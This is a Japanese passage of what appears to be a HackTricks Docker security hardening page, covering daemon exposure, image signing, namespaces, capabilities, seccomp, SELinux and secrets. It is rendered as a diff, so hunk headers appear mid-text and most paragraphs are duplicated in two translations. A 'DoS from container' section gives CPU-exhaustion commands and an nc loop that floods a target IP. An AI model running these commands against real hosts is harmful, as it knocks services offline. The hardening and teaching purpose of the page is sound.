`run/docker.sock`にリッスンし、Ubuntuディストリビューションでは、Dockerの起動オプションは`/etc/default/docker`に指定されています。Docker APIとクライアントがリモートからDockerエンジンにアクセスできるようにするには、**httpソケットを使用してDockerデーモンを公開**する必要があります。これは次のように行います:
デフォルトでは、Docker Engineは`unix:///var/run/docker.sock`でUnixソケットをリッスンします。Ubuntuシステムでは、Dockerの起動オプションは`/etc/default/docker`に定義されています。Docker APIとクライアントへのリモートアクセスを有効にするには、次の設定を追加してDockerデーモンをHTTPソケット経由で公開します
```bash
DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H
tcp://192.168.56.101:2376" -> add this to /etc/default/docker
Sudo service docker restart -> Restart Docker daemon
DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H tcp://192.168.56.101:2376"
sudo service docker restart
```
Dockerデーモンをhttpを使用して公開することは良い習慣ではありません。接続をhttpsを使用してセキュリティを確保する必要があります。2つのオプションがあります最初のオプションは**クライアントがサーバーの身元を確認する**ことで、2番目のオプションは**クライアントとサーバーがお互いの身元を確認する**ことです。証明書はサーバーの身元を確立します。両方のオプションの例については[**このページを確認してください**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/)。
DockerデーモンをHTTP経由で公開することはセキュリティ上の懸念から推奨されていません。接続を安全にするためにはHTTPSを使用することが望ましいです。接続を保護するための主なアプローチは2つあります
1. クライアントがサーバーの正体を確認します。
2. クライアントとサーバーがお互いの正体を相互認証します。
### **コンテナイメージのセキュリティ**
証明書はサーバーの正体を確認するために使用されます。両方の方法の詳細な例については、[**このガイド**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/)を参照してください。
コンテナイメージは、プライベートリポジトリまたはパブリックリポジトリに保存されます。Dockerがコンテナイメージの保存に提供するオプションは以下の通りです
### コンテナイメージのセキュリティ
* [Docker hub](https://hub.docker.com) これはDockerが提供するパブリックレジストリサービスです。
* [Docker registry](https://github.com/%20docker/distribution) これはユーザーが自分のレジストリをホストするために使用できるオープンソースプロジェクトです。
* [Docker trusted registry](https://www.docker.com/docker-trusted-registry) これはDockerの商用実装であり、ロールベースのユーザー認証とLDAPディレクトリサービスの統合を提供します。
コンテナイメージは、プライベートまたはパブリックのリポジトリに保存することができます。Dockerには、コンテナイメージのためのいくつかのストレージオプションがあります
* **[Docker Hub](https://hub.docker.com)**: Dockerのパブリックレジストリサービス。
* **[Docker Registry](https://github.com/docker/distribution)**: ユーザーが独自のレジストリをホストできるオープンソースプロジェクト。
* **[Docker Trusted Registry](https://www.docker.com/docker-trusted-registry)**: Dockerの商用レジストリオファリングで、ロールベースのユーザー認証とLDAPディレクトリサービスとの統合を提供しています。
### イメージスキャン
コンテナには、ベースイメージのため、またはベースイメージの上にインストールされたソフトウェアのために、**セキュリティの脆弱性**が存在する可能性があります。Dockerは、コンテナのセキュリティスキャンを行い脆弱性をリストアップする**Nautilus**というプロジェクトに取り組んでいます。Nautilusは、各コンテナイメージレイヤーを脆弱性リポジトリと比較してセキュリティホールを特定することによって機能します。
コンテナには、ベースイメージまたはベースイメージの上にインストールされたソフトウェアのせいで**セキュリティの脆弱性**がある場合があります。Dockerは、コンテナのセキュリティスキャンを行い脆弱性をリストアップするプロジェクト**Nautilus**に取り組んでいます。Nautilusは、各コンテナイメージレイヤーを脆弱性リポジトリと比較してセキュリティホールを特定します。
詳細については[**こちらをお読みください**](https://docs.docker.com/engine/scan/)。
詳細は[**こちらを参照してください**](https://docs.docker.com/engine/scan/)。
* **`docker scan`**
**`docker scan`** コマンドを使用すると、イメージ名またはIDを使用して既存のDockerイメージをスキャンできます。例えば、以下のコマンドを実行してhello-worldイメージをスキャンします
**`docker scan`**コマンドを使用すると、イメージ名またはIDを使用して既存のDockerイメージをスキャンできます。たとえば、次のコマンドを実行してhello-worldイメージをスキャンします
```bash
docker scan hello-world
@ -87,74 +87,56 @@ snyk container test <image> --json-file-output=<output file> --severity-threshol
```bash
clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5
```
### Docker イメージ署名
### Dockerイメージ署名
Docker コンテナイメージは、パブリックまたはプライベートレジストリに保存できます。イメージが改ざんされていないことを確認するために、コンテナイメージに**署名**する必要があります。コンテンツ**発行者**は、コンテナイメージに署名してレジストリにプッシュする責任があります。\
以下は Docker コンテンツ信頼に関するいくつかの詳細です:
Dockerイメージの署名は、コンテナで使用されるイメージのセキュリティと整合性を確保します。以下は簡潔な説明です
* Docker コンテンツ信頼は、[Notary オープンソースプロジェクト](https://github.com/docker/notary)の実装です。Notary オープンソースプロジェクトは、[The Update Framework (TUF) プロジェクト](https://theupdateframework.github.io)に基づいています
* Docker コンテンツ**信頼は** `export DOCKER_CONTENT_TRUST=1` で**有効になります**。Docker バージョン 1.10 以降、コンテンツ信頼は**デフォルトでは有効になっていません**
* コンテンツ信頼が**有効な場合**、**署名されたイメージのみをプルできます**。イメージをプッシュするときは、タグ付けキーを入力する必要があります。
* 発行者が docker push を使用して**初めて**イメージを**プッシュ**するとき、**ルートキーとタグ付けキー**の**パスフレーズ**を入力する必要があります。他のキーは自動的に生成されます。
* Docker は Yubikey を使用したハードウェアキーのサポートも追加し、詳細は[こちら](https://blog.docker.com/2015/11/docker-content-trust-yubikey/)で利用可能です。
- **Docker Content Trust** は、Notaryプロジェクトを利用し、The Update Framework (TUF) に基づいてイメージの署名を管理します。詳細については、[Notary](https://github.com/docker/notary) と [TUF](https://theupdateframework.github.io) を参照してください
- Docker content trust を有効にするには、`export DOCKER_CONTENT_TRUST=1` を設定します。この機能は、Docker バージョン1.10以降ではデフォルトでオフになっています
- この機能を有効にすると、署名されたイメージのみがダウンロードできます。初回のイメージプッシュでは、ルートとタグ付けキーのパスフレーズを設定する必要があり、Dockerはセキュリティを強化するためにYubikeyもサポートしています。詳細は[こちら](https://blog.docker.com/2015/11/docker-content-trust-yubikey/)にあります。
- content trust を有効にした状態で署名されていないイメージを取得しようとすると、「No trust data for latest」というエラーが発生します。
- 初回以降のイメージプッシュでは、Dockerはイメージに署名するためにリポジトリキーのパスフレーズを要求します。
以下は、コンテンツ信頼が有効でイメージが署名されていない場合に得られる**エラー**です。
```shell-session
$ docker pull smakam/mybusybox
Using default tag: latest
No trust data for latest
```
以下の出力は、**署名が有効になっているDocker hubへのContainerイメージのプッシュ**を示しています。これが初めてではないため、ユーザーはリポジトリキーのパスフレーズのみを入力するよう求められます。
```shell-session
$ docker push smakam/mybusybox:v2
The push refers to a repository [docker.io/smakam/mybusybox]
a7022f99b0cc: Layer already exists
5f70bf18a086: Layer already exists
9508eff2c687: Layer already exists
v2: digest: sha256:8509fa814029e1c1baf7696b36f0b273492b87f59554a33589e1bd6283557fc9 size: 2205
Signing and pushing trust metadata
Enter passphrase for repository key with ID 001986b (docker.io/smakam/mybusybox):
```
```markdown
ルートキー、リポジトリキー、およびパスフレーズを安全な場所に保管する必要があります。以下のコマンドを使用してプライベートキーのバックアップを取ることができます:
```
プライベートキーをバックアップするには、次のコマンドを使用します:
```bash
tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
```
Dockerホストを変更した際、新しいホストから操作を行うために、ルートキーとリポジトリキーを移動する必要がありました
Dockerホストを切り替える際には、操作を維持するためにルートとリポジトリキーを移動する必要があります。
***
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で**最も進んだ**コミュニティツールによって動力を得た**ワークフローの自動化**を簡単に構築しましょう。\
今すぐアクセス
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## コンテナセキュリティ機能
## コンテナセキュリティ機能
<details>
<summary>コンテナセキュリティ機能の概要</summary>
<summary>コンテナセキュリティ機能の概要</summary>
**ネームスペース**
### メインプロセスの分離機能
ネームスペースは、プロジェクトを他のプロジェクトから隔離するのに役立ち、プロセス通信、ネットワーク、マウントなどを隔離します。これは、Dockerプロセスを他のプロセスから隔離するのに役立ち/procフォルダも含む、他のプロセスを悪用して脱出することができないようにします。
コンテナ化された環境では、プロジェクトとそのプロセスを分離することがセキュリティとリソース管理にとって重要です。以下は主要な概念の簡略化された説明です:
バイナリ**`unshare`****`unshare`**システムコールを使用)を使用して「脱出」、正確には**新しいネームスペースを作成する**ことが可能です。Dockerはデフォルトでこれを防ぎますが、Kubernetesはこの文章の執筆時点では防ぎません。\
とはいえ、これは新しいネームスペースを作成するのに役立ちますが、ホストのデフォルトネームスペースに**戻ることはできません**(ホストネームスペース内の何らかの`/proc`にアクセスできる場合を除き、その場合は**`nsenter`**を使用してホストネームスペースに入ることができます)。
#### **ネームスペース**
- **目的**: プロセス、ネットワーク、およびファイルシステムなどのリソースの分離を確保します。特にDockerでは、ネームスペースはコンテナのプロセスをホストや他のコンテナから分離します。
- **`unshare`の使用**: `unshare`コマンドまたはその基礎となるシスコールを使用して新しいネームスペースを作成し、追加の分離レイヤーを提供します。ただし、Kubernetesはこれを元々ブロックしませんが、Dockerはします。
- **制限**: 新しいネームスペースを作成することで、プロセスがホストのデフォルトのネームスペースに戻ることはできません。ホストのネームスペースに侵入するには、通常、ホストの`/proc`ディレクトリへのアクセスが必要で、`nsenter`を使用して入力します。
**CGroups**
#### **コントロールグループCGroups**
- **機能**: プロセス間でリソースを割り当てるために主に使用されます。
- **セキュリティの側面**: CGroups自体は、`release_agent`機能を除いて、分離セキュリティを提供しません。この機能が誤構成されている場合、不正アクセスに悪用される可能性があります。
これによりリソースを制限できますが、プロセスの隔離のセキュリティには影響しません(`release_agent`を使用して脱出することは可能ですが)。
#### **機能の削除**
- **重要性**: プロセスの分離のための重要なセキュリティ機能です。
- **機能**: 特定の機能をドロップすることにより、ルートプロセスが実行できるアクションを制限します。プロセスがルート権限で実行されていても、必要な機能がないと特権アクションを実行できなくなり、シスコールは不十分な権限のために失敗します。
**Capabilities Drop**
プロセス隔離のセキュリティに関しては、これが**最も重要な**機能の一つだと考えています。これは、機能がなければ、プロセスがrootとして実行されていても、必要な機能を持っていないために呼び出された**`syscall`**が権限エラーを返すため、**特権アクションを実行できない**からです。
これらは、プロセスが他の機能をドロップした後に**残る機能**です:
これは、プロセスが他の機能をドロップした後の**残りの機能**です:
{% code overflow="wrap" %}
```
@ -164,30 +146,30 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca
**Seccomp**
Dockerではデフォルトで有効になっています。これにより、プロセスが呼び出すことができる**システムコールをさらに制限**するのに役立ちます。
**デフォルトのDocker Seccompプロファイル**はこちらで確認できます:[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)
Dockerではデフォルトで有効になっています。これにより、プロセスが呼び出すことができる**システムコールをさらに制限**するのに役立ちます。\
**デフォルトのDocker Seccompプロファイル**は[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)で見つけることができます。
**AppArmor**
Dockerには、以下のリンクからアクティブにできるテンプレートがあります:[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
Dockerには、アクティブ化できるテンプレートがあります: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
これにより、機能、システムコール、ファイルやフォルダへのアクセスを制限できます...
これにより、機能の制限、システムコール、ファイルやフォルダへのアクセスが可能になります...
</details>
### Namespaces
### 名前空間
**Namespaces**はLinuxカーネルの機能で、**カーネルリソースを分割**し、あるセットの**プロセス**があるセットの**リソース**を見る一方で、**別の**セットの**プロセス**が**異なる**セットのリソースを見ることができます。この機能は、リソースとプロセスの同じ名前空間を持つことにより動作しますが、それらの名前空間は異なるリソースを指します。リソースは複数の空間に存在することができます。
**名前空間**はLinuxカーネルの機能で、1つの**プロセス**セットが1つの**リソース**セットを**見る**一方、別の**プロセス**セットが**異なる**リソースセットを**見る**ようにカーネルリソースを**分割**する機能です。この機能は、一連のリソースとプロセスに同じ名前空間を持たせることで機能し、ただし、それらの名前空間は異なるリソースを参照します。リソースは複数のスペースに存在する可能性があります。
Dockerは、コンテナの隔離を実現するために以下のLinuxカーネルNamespacesを利用しています
Dockerは、コンテナの分離を実現するために以下のLinuxカーネル名前空間を利用しています:
* pid namespace
* mount namespace
* network namespace
* ipc namespace
* UTS namespace
* pid名前空間
* マウント名前空間
* ネットワーク名前空間
* ipc名前空間
* UTS名前空間
**名前空間に関する詳細情報**については、以下のページを確認してください:
**名前空間に関する詳細情報**については、以下のページを参照してください:
{% content-ref url="namespaces/" %}
[namespaces](namespaces/)
@ -195,62 +177,71 @@ Dockerは、コンテナの隔離を実現するために以下のLinuxカーネ
### cgroups
Linuxカーネルの機能**cgroups**は、プロセスのセットに対してcpu、メモリ、io、ネットワーク帯域幅などのリソースを**制限する能力**を提供します。Dockerはcgroup機能を使用してコンテナを作成し、特定のコンテナのリソース制御を可能にします。
以下は、ユーザースペースメモリを500mに、カーネルメモリを50mに、cpuシェアを512に、blkioweightを400に制限したコンテナです。CPUシェアはコンテナのCPU使用量を制御する比率です。デフォルト値は1024で、範囲は0から1024です。CPUリソースの競合がある場合、3つのコンテナが同じCPUシェア1024を持っていると、各コンテナは最大で33%のCPUを使用できます。blkio-weightはコンテナのIOを制御する比率です。デフォルト値は500で、範囲は10から1000です。
Linuxカーネル機能である**cgroups**は、プロセスのセット間で**cpu、メモリ、io、ネットワーク帯域幅などのリソースを制限**する機能を提供します。 Dockerは、cgroup機能を使用してリソース制御を可能にするコンテナを作成することができます。\
以下は、ユーザースペースメモリが500mに制限され、カーネルメモリが50mに制限され、CPU共有が512に、blkioweightが400に設定されたコンテナの例です。 CPU共有は、コンテナのCPU使用率を制御する比率です。デフォルト値は1024で、0から1024までの範囲があります。 CPUリソースの競合が発生した場合、CPU共有が1024の3つのコンテナがある場合、各コンテナはCPUの33%まで取得できます。 blkio-weightは、コンテナのIOを制御する比率です。デフォルト値は500で、10から1000の範囲があります。
```
docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash
```
コンテナのcgroupを取得するには、以下の操作を行います:
コンテナのcgroupを取得するには、次のようにします:
```bash
docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container
ps -ef | grep 1234 #Get info about the sleep process
ls -l /proc/<PID>/ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it)
```
詳細については、以下を確認してください:
以下の情報を確認してください:
{% content-ref url="cgroups.md" %}
[cgroups.md](cgroups.md)
{% endcontent-ref %}
### Capabilities(機能)
### Capabilities
Capabilitiesは、rootユーザーに許可される機能を**より細かく制御する**ために使用されます。DockerはLinuxカーネルのcapability機能を使用して、ユーザーの種類に関係なく**コンテナ内で実行できる操作を制限します**
Capabilitiesはrootユーザーに許可される機能をより細かく制御することができます。DockerはLinuxカーネルの機能を使用して、ユーザーの種類に関係なく、コンテナ内で行われる操作を制限します
dockerコンテナを実行すると、**プロセスは隔離から脱出するために使用できる機密性の高い機能を削除します**。これにより、プロセスが機密性の高い操作を実行して脱出することがないようにしようとします:
Dockerコンテナが実行されると、プロセスは隔離から脱出するために使用できる機密情報を削除します。これにより、プロセスが機密なアクションを実行して脱出することができないようにします:
{% content-ref url="../linux-capabilities.md" %}
[linux-capabilities.md](../linux-capabilities.md)
{% endcontent-ref %}
### DockerのSeccomp
### DockerのSeccomp
これはDockerが**コンテナ内で使用できるシステムコールを制限する**ためのセキュリティ機能です:
これはDockerがコンテナ内で使用できるシステムコールを制限するセキュリティ機能です
{% content-ref url="seccomp.md" %}
[seccomp.md](seccomp.md)
{% endcontent-ref %}
### DockerのAppArmor
### DockerのAppArmor
**AppArmor**は、**プログラムごとのプロファイル**を使用して**コンテナ**を**限定された**リソースに制限するカーネルの強化機能です。:
AppArmorは、コンテナを限られたリソースセットに制限するためのカーネルの拡張機能です。プログラムごとのプロファイルを使用してコンテナを制限します
{% content-ref url="apparmor.md" %}
[apparmor.md](apparmor.md)
{% endcontent-ref %}
### DockerのSELinux
### DockerのSELinux
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux)は、**ラベリング** **システム**です。すべての**プロセス**とファイルシステムオブジェクトには**ラベル**があります。SELinuxポリシーは、**プロセスラベルがシステム上の他のすべてのラベルで何を行うことが許可されているか**についてのルールを定義します。
- **ラベリングシステム**SELinuxは、すべてのプロセスとファイルシステムオブジェクトに一意のラベルを割り当てます。
- **ポリシーの強制**:プロセスラベルがシステム内の他のラベルに対して実行できるアクションを定義するセキュリティポリシーを強制します。
- **コンテナプロセスラベル**:コンテナエンジンがコンテナプロセスを開始すると、通常は`container_t`という制限されたSELinuxラベルが割り当てられます。
- **コンテナ内のファイルラベリング**:コンテナ内のファイルは通常、`container_file_t`としてラベル付けされます。
- **ポリシールール**SELinuxポリシーは、主に`container_t`ラベルを持つプロセスが`container_file_t`とラベル付けされたファイルとのみ相互作用(読み取り、書き込み、実行)できることを確認します。
コンテナエンジンは、通常`container_t`として**コンテナプロセスを単一の制限されたSELinuxラベルで起動し**、その後コンテナ内のコンテナを`container_file_t`としてラベル付けします。SELinuxポリシールールは基本的に、**`container_t`プロセスは`container_file_t`とラベル付けされたファイルのみを読み書き/実行できる**と言っています。
このメカニズムにより、コンテナ内のプロセスが侵害された場合でも、対応するラベルを持つオブジェクトとのみ相互作用するように制限され、そのような侵害からの潜在的な被害が大幅に制限されます。
{% content-ref url="../selinux.md" %}
[selinux.md](../selinux.md)
{% endcontent-ref %}
### AuthZ & AuthN
### AuthZAuthN
認証プラグインは、現在の**認証**コンテキストと**コマンド**コンテキストの両方に基づいて、Docker**デーモン**への**リクエスト**を**承認**または**拒否**します。**認証**コンテキストには、すべての**ユーザー詳細**と**認証**方法が含まれます。**コマンドコンテキスト**には、すべての**関連する**リクエストデータが含まれます。
Dockerでは、認可プラグインが重要な役割を果たし、Dockerデーモンへのリクエストを許可するかブロックするかを決定します。この決定は、次の2つのキーとなるコンテキストを調査することで行われます
- **認証コンテキスト**:これには、ユーザーに関する包括的な情報が含まれます。誰であるか、どのように認証されたかなど。
- **コマンドコンテキスト**:これには、行われているリクエストに関連するすべての関連データが含まれます。
これらのコンテキストにより、認証されたユーザーからの正当なリクエストのみが処理され、Docker操作のセキュリティが向上します。
{% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %}
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
@ -258,7 +249,7 @@ dockerコンテナを実行すると、**プロセスは隔離から脱出する
## コンテナからのDoS
コンテナが使用できるリソースを適切に制限していない場合、侵害されたコンテナは実行しているホストをDoS攻撃する可能性があります。
コンテナが使用できるリソースを適切に制限していない場合、侵害されたコンテナが実行されているホストをDoS攻撃する可能性があります。
* CPU DoS
```bash
@ -268,15 +259,15 @@ sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t
# While loop
docker run -d --name malicious-container -c 512 busybox sh -c 'while true; do :; done'
```
* バンド幅DoS
* バンド幅 DoS
```bash
nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc <target IP> 4444; done
```
## 興味深いDockerフラグ
## インタレスティングなDockerフラグ
### --privilegedフラグ
### --privileged フラグ
以下のページでは、**`--privileged`フラグが何を意味するのか**について学ぶことができます:
次のページで、**`--privileged` フラグが意味するもの**を学ぶことができます:
{% content-ref url="docker-privileged.md" %}
[docker-privileged.md](docker-privileged.md)
@ -286,9 +277,9 @@ nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc <target IP> 4444;
#### no-new-privileges
低権限ユーザーとしてアクセスを得た攻撃者がコンテナ内で実行されている場合、**誤設定されたsuidバイナリ**があれば、攻撃者はそれを悪用して**コンテナ内で権限を昇格**させる可能性があります。これにより、コンテナからの脱出が可能になるかもしれません。
低権限ユーザーとしてアクセスを取得した攻撃者がコンテナを実行している場合、**誤って構成されたsuidバイナリ**があると、攻撃者はそれを悪用してコンテナ内で**特権を昇格**させる可能性があります。これにより、脱出することができるかもしれません。
**`no-new-privileges`** オプションを有効にしてコンテナを実行すると、この種の権昇格を**防ぐことができます**
**`no-new-privileges`** オプションを有効にしてコンテナを実行すると、**この種の権昇格を防ぐ**ことができます。
```
docker run -it --security-opt=no-new-privileges:true nonewpriv
```
@ -307,108 +298,93 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
# You can manually disable selinux in docker with
--security-opt label:disable
```
以下のオプションについては、こちらをご覧ください: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
さらなる**`--security-opt`**オプションについては、[https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)を参照してください。
## その他のセキュリティに関する考慮事項
## その他のセキュリティ考慮事項
### シークレットの管理
### シークレットの管理:ベストプラクティス
まず第一に、**イメージの中に入れないでください!**
Dockerイメージにシークレットを直接埋め込んだり、環境変数を使用したりすることは避けることが重要です。これらの方法は、`docker inspect`や`exec`などのコマンドを介してコンテナにアクセス権を持つ人に機密情報を公開してしまいます。
また、**環境変数を使用して機密情報を管理しないでください**。**`docker inspect`や`exec`コマンドを実行できる人は誰でもあなたのシークレットを見つけることができます**
**Dockerボリューム**は、機密情報にアクセスするために推奨されるより安全な代替手段です。これらは一時的なメモリ内のファイルシステムとして利用でき、`docker inspect`やログ記録に関連するリスクを軽減します。ただし、ルートユーザーやコンテナへの`exec`アクセス権を持つユーザーは依然としてシークレットにアクセスできる可能性があります
Dockerボリュームの使用がより良いです。これはDockerのドキュメントで推奨されている機密情報へのアクセス方法です。**メモリ内に一時的なファイルシステムとしてボリュームを使用することができます**。ボリュームは`docker inspect`とログ記録のリスクを排除します。しかし、**rootユーザーはまだシークレットを見ることができ、`exec`コマンドを実行できる人も同様です**
**Dockerシークレット**は、機密情報を取り扱うためのさらに安全な方法を提供します。イメージのビルドフェーズ中にシークレットが必要な場合、**BuildKit**はビルド時間シークレットをサポートする効率的なソリューションを提供し、ビルド速度を向上させ、追加の機能を提供します
ボリュームよりも**さらに良い方法は、Dockerシークレットを使用することです**。
BuildKitを活用するためには、次の3つの方法でアクティブ化できます
もしイメージ内で**シークレットが必要な場合**、**BuildKit**を使用することができます。BuildKitはビルド時間を大幅に短縮し、**ビルド時のシークレットサポート**を含む他の便利な機能を持っています。
1. 環境変数を介して:`export DOCKER_BUILDKIT=1`
2. コマンドにプレフィックスを付けて:`DOCKER_BUILDKIT=1 docker build .`
3. Docker構成でデフォルトで有効にする`{ "features": { "buildkit": true } }`と記述し、その後にDockerを再起動します。
BuildKitバックエンドを指定してその機能を今すぐ使用するには3つの方法があります。:
1. 環境変数として設定するには`export DOCKER_BUILDKIT=1`とします。
2. `build`または`run`コマンドを`DOCKER_BUILDKIT=1`で始めます。
3. BuildKitをデフォルトで有効にする。_/etc/docker/daemon.json_の設定を`{ "features": { "buildkit": true } }`として_true_に設定し、Dockerを再起動します。
4. そして、ビルド時に`--secret`フラグを使用してシークレットを使用することができます。以下のようにします:
BuildKitを使用すると、`--secret`オプションを使用してビルド時間シークレットを利用でき、これらのシークレットがイメージビルドキャッシュや最終イメージに含まれないようにします。
```bash
docker build --secret my_key=my_value ,src=path/to/my_secret_file .
```
ファイルでシークレットをキーと値のペアとして指定します。
これらのシークレットはイメージビルドキャッシュから、そして最終イメージから除外されます。
イメージをビルドする際だけでなく、**実行中のコンテナ内でシークレットが必要な場合**は、**Docker ComposeまたはKubernetes**を使用します。
Docker Composeを使用する場合、サービスにシークレットのキーと値のペアを追加し、シークレットファイルを指定します。以下の例は、[Stack Exchangeの回答](https://serverfault.com/a/936262/535325)のDocker Composeのシークレットのヒントに基づいて適応されています。
シークレットを含む`docker-compose.yml`の例:
実行中のコンテナで必要なシークレットについては、**Docker ComposeとKubernetes**が堅牢なソリューションを提供しています。Docker Composeは、`docker-compose.yml`の例に示すように、サービス定義でシークレットファイルを指定するための`secrets`キーを利用します。
```yaml
version: "3.7"
services:
my_service:
image: centos:7
entrypoint: "cat /run/secrets/my_secret"
secrets:
- my_secret
secrets:
my_secret:
file: ./my_secret_file.txt
```
以下は、通常どおり `docker-compose up --build my_service` でComposeを開始します。
この設定では、Docker Composeを使用してサービスを起動する際にシークレットを使用できるようになります。
[Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret/) を使用している場合、シークレットに対応しています。 [Helm-Secrets](https://github.com/futuresimple/helm-secrets) は、K8sでのシークレット管理を容易にするのに役立ちます。さらに、K8sにはロールベースのアクセス制御RBACがあります。Docker Enterpriseも同様です。RBACは、チームにとってシークレット管理をより管理しやすく、より安全にします。
Kubernetes環境では、シークレットはネイティブでサポートされており、[Helm-Secrets](https://github.com/futuresimple/helm-secrets)などのツールでさらに管理できます。KubernetesのRole Based Access ControlsRBACは、Docker Enterpriseと同様にシークレット管理のセキュリティを向上させます。
### gVisor
**gVisor** は、Goで書かれたアプリケーションカーネルで、Linuxシステムの大部分を実装しています。これには `runsc` という [Open Container Initiative (OCI)](https://www.opencontainers.org) ランタイムが含まれており、**アプリケーションとホストカーネルの間に隔離境界を提供します**。`runsc` ランタイムはDockerとKubernetesに統合されており、サンドボックス化されたコンテナを簡単に実行できます。
**gVisor**は、Goで書かれたアプリケーションカーネルであり、Linuxシステムサーフェスの大部分を実装しています。これには、アプリケーションとホストカーネルの間の**隔離境界**を提供する[Open Container InitiativeOCI](https://www.opencontainers.org)ランタイムである`runsc`が含まれています。`runsc`ランタイムはDockerとKubernetesと統合されており、サンドボックス化されたコンテナを簡単に実行できます。
{% embed url="https://github.com/google/gvisor" %}
### Kata Containers
**Kata Containers** は、コンテナのように感じられ、コンテナのように動作するが、ハードウェア仮想化技術を使用して **より強力なワークロードの隔離を提供する** 軽量な仮想マシンを構築するために取り組むオープンソースコミュニティです。
**Kata Containers**は、コンテナと同様に感じ、パフォーマンスが高い軽量な仮想マシンを使用して、**ハードウェア仮想化技術を使用してより強力なワークロード分離**を提供するセキュアなコンテナランタイムを構築するために取り組むオープンソースコミュニティです。
{% embed url="https://katacontainers.io/" %}
### 要約のヒント
* **`--privileged` フラグを使用しないでください。また、**[**Dockerソケットをコンテナ内にマウントしないでください**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**。** Dockerソケットを使用すると、コンテナを生成できるため、例えば `--privileged` フラグを使用して別のコンテナを実行することで、ホストを完全に制御する簡単な方法です。
* **コンテナ内でrootとして実行しないでください。**[**異なるユーザー**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **と** [**ユーザーネームスペース**](https://docs.docker.com/engine/security/userns-remap/) **を使用してください。** コンテナのrootは、ユーザーネームスペースでリマップされていない限り、ホスト上のrootと同じです。主にLinuxのネームスペース、機能、およびcgroupsによって軽く制限されているだけです。
* [**すべての機能をドロップ**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`)し、必要なもののみを有効にします** (`--cap-add=...`)。多くのワークロードはいかなる機能も必要とせず、それらを追加すると潜在的な攻撃の範囲が広がります。
* [**“no-new-privileges” セキュリティオプションを使用して**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)、例えばsuidバイナリを通じて、プロセスがより多くの権限を得るのを防ぎます。
* [**コンテナに利用可能なリソースを制限します**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**。** リソース制限は、サービス拒否攻撃からマシンを保護することができます。
* **[**seccomp**](https://docs.docker.com/engine/security/seccomp/)**、**[**AppArmor**](https://docs.docker.com/engine/security/apparmor/)**またはSELinux** プロファイルを調整して、コンテナで利用可能なアクションとシステムコールを最小限に制限します。
* **[**公式のdockerイメージ**](https://docs.docker.com/docker-hub/official\_images/) を使用し、署名を要求するか、それらに基づいて自分のイメージを構築してください。** バックドアが仕掛けられたイメージを継承したり使用したりしないでください。また、rootキー、パスフレーズを安全な場所に保管してください。DockerはUCPでキーを管理する計画を持っています。
* **定期的に** イメージを **再構築して、ホストとイメージにセキュリティパッチを適用します。**
* **シークレットを賢く管理し**、攻撃者がアクセスするのが難しくします。
* **dockerデーモンを公開する場合はHTTPSを使用し**、クライアントとサーバーの認証を行います。
* Dockerfileでは、**ADDの代わりにCOPYを優先します**。ADDは自動的に圧縮ファイルを展開し、URLからファイルをコピーすることができます。COPYにはこれらの機能がありません。可能な限りADDの使用を避け、リモートURLやZipファイルを介した攻撃に対して脆弱にならないようにしてください。
* **各マイクロサービスごとに別々のコンテナを持ちます**
* **コンテナ内にsshを置かないでください**、「docker exec」はコンテナにsshするために使用できます。
* **より小さい** コンテナ **イメージを持ちます**
* **`--privileged`フラグを使用しない**か、[**コンテナ内にDockerソケットをマウントしないでください**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)。 Dockerソケットを使用すると、コンテナを生成できるため、たとえば`--privileged`フラグを使用して別のコンテナを実行することでホストを完全に制御できます。
